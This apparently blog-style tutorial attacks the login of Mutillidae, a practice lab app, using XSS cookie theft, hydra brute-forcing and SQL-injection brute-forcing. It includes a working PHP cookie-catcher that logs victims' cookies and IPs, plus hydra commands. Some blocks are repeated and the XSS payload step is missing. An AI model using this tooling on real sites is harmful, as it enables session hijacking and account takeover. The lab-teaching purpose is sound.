Broken Authentication and Session Management is on number 2 in OWASP Top 10 vulnerability list 2013. In mutillidae , it contain three subsection.
- Authentication Bypass
- Privilege Escalation
- Username Enumeration
We have already covered Username enumeration in last article & we got valid username list which exist in database. Today we are going to use authentication bypass method.
- Using cookie
- Using brute-force
- Using SQL injection
(1)Authentication Bypass using cookie:-
As we know that , mutillidae is vulnerable to XSS, so we can capture cookie with help of XSS. We are going to take advantage of persistent XSS.
http://127.0.0.1/mutillidae/index.php?page=add-to-your-blog.php
Above link is vulnerable to persistent XSS attack. We can submit html to add blog section.so we are going to use cookie-catcher.
Content of cookie_catcher.php :-
header ("Location: http://192.168.56.1");
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.'
');
fclose($fp);
?>
Upload your cookie_catcher.php to server. For demo i used my local apache server & after execution of script it will redirect to 192.168.56.1.You can change the code according to your need. It will grab IP, cookie, Referer, time & date.
http://127.0.0.1/mutillidae/index.php?page=add-to-your-blog.php
Above link is vulnerable to persistent XSS attack. We can submit html to add blog section.so we are going to use cookie-catcher.
Content of cookie_catcher.php :-
header ("Location: http://192.168.56.1");
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.'
');
fclose($fp);
?>
Upload your cookie_catcher.php to server. For demo i used my local apache server & after execution of script it will redirect to 192.168.56.1.You can change the code according to your need. It will grab IP, cookie, Referer, time & date.
Now as anonymous user , we will add blog entry.I used other OS on my virtual box for attack.
(1)Open http://192.168.56.1/mutillidae/index.php?page=add-to-your-blog.php
(2)Submit following html to blog
nirav k desai
help me
(4)To view cookie open cookie.html.
(5)Now you can use any cookie manager add-on to edit cookie; replace cookie which we got.
(6)After reload we got admin access to web-application.
(2)Authentication Bypass Using bruteforce:-
You can use hydra or burpe intruder to bruteforce login form of application.
hydra -l admin -P /root/pass.txt 127.0.0.1 http-post-form "/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In"
hydra -l admin -P /root/pass.txt 127.0.0.1 http-post-form "/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In"
(3)Authentication Bypass Using sql injection:-
We can inject special database characters or SQL timing attacks into
page parameters. We are going to use login page; and inject sql
character to login form.
You can use SQL injection cheat sheet & we will brute-force using SQL statements.Save it to file.
hydra -l admin -P /root/sql 127.0.0.1 http-post-form "/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In"
You can use SQL injection cheat sheet & we will brute-force using SQL statements.Save it to file.
hydra -l admin -P /root/sql 127.0.0.1 http-post-form "/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In"
And we got for valid SQL statements ; with help of it we can bypass admin panel.
Aucun commentaire:
Enregistrer un commentaire